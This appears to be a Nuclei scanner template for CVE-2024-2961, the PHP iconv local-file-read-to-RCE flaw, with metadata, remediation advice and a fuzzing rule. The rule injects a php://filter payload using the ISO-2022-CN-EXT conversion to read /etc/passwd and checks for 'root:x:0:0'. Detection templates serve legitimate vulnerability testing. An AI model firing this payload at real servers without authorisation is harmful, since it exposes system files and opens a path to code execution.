漏洞描述
PHP Local File Read vulnerability leading to Remote Code Execution
CVE-2024-2961: PHP - LFR to Remote Code Execution
PoC代码[已公开]
id: CVE-2024-2961
info:
name: PHP - LFR to Remote Code Execution
author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723
severity: high
description: |
PHP Local File Read vulnerability leading to Remote Code Execution
impact: |
Remote attackers can execute arbitrary code on the server
remediation: |
Update PHP to the latest version and sanitize user input to prevent LFR attacks
reference:
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961
- https://nvd.nist.gov/vuln/detail/CVE-2024-2961
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
cvss-score: 7.3
cve-id: CVE-2024-2961
cwe-id: CWE-787
epss-score: 0.9261
epss-percentile: 0.99728
tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast,vkev,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- '!regex("root:x:0:0", body)'
internal: true
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
- 'method == "POST"'
payloads:
phppayload:
- "php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
stop-at-first-match: true
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{phppayload}}"
matchers:
- type: regex
regex:
- "root:x:0:0"
# digest: 490a0046304402207898a7fa1f4e7976274eb79c41a3996b7341e8a9b289274b04f13eab93b84cda0220149dcdb89227aaafe0828447d88d7817eb04bb1ac8be4d5c028d83fccc929b97:922c64590222798bb761d5b6d8e72950